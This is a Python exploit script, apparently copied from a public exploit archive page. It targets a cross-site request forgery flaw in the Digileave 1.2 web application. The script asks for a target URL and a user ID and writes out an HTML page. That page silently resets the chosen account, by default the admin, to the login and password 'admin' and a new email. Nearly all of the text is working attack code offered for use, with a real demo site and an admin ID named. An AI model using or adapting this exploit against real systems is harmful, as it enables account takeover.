扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 |
#!/usr/local/bin/python # # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin) # Dork: N/A # Date: 18.09.2017 # Vendor Homepage: http://www.digiappz.com/ # Software Link: http://www.digiappz.com/digileave.asp?id=1 # Demo: http://www.digiappz.com/digileave/login.asp # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') def csrfexploit(): e_baslik = ''' ################################################################################ _____________ ____ __ _____ _______ ____________ __ /_/ / / / ___// |/ | / // ___// ____/ | / / ____/ |/ | / / / // /_/ /\__ \/ /| | /|/ / \__ \/ __/ /|/ / / / /| | /|/ / _/ // __/___/ / ___ |/ /|/ ___/ / /___/ /|/ /___/ ___ |/ /|/ /___/_/ /_//____/_/|_/_/ |_/ /____/_____/_/ |_/\____/_/|_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digileave 1.2 - CSRF (Update Admin) ################################################################################ ''' print e_baslik url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: ")) id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ") csrfhtmlcode = ''' <html> <body> <form method="POST" action="%s/user_save.asp" name="user"> <table border="0" align="center"> <tbody><tr> <td valign="middle"> <table border="0" align="center"> <tbody><tr> <td bgcolor="gray" align="center"> <table width="400" cellspacing="1" cellpadding="2" border="0"> <tbody><tr> <td colspan="2" bgcolor="cream" align="left"> <font color="red">User Update</font> </td> </tr> <tr> <td> <font><b>Choose Login*</b></font> </td> <td> <input name="login" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Choose Password*</b></font> </td> <td> <input name="password" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>First Name*</b></font> </td> <td> <input name="first_name" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Last Name*</b></font> </td> <td> <input name="last_name" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Email*</b></font> </td> <td> <input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text"> </td> </tr> <tr> <td colspan="2" align="center"> <input name="id" value="%s" type="hidden"> <input value="Update" onclick="return check()" type="submit"> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </form> ''' %(url, id) print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("") csrfexploit() |
体验盒子
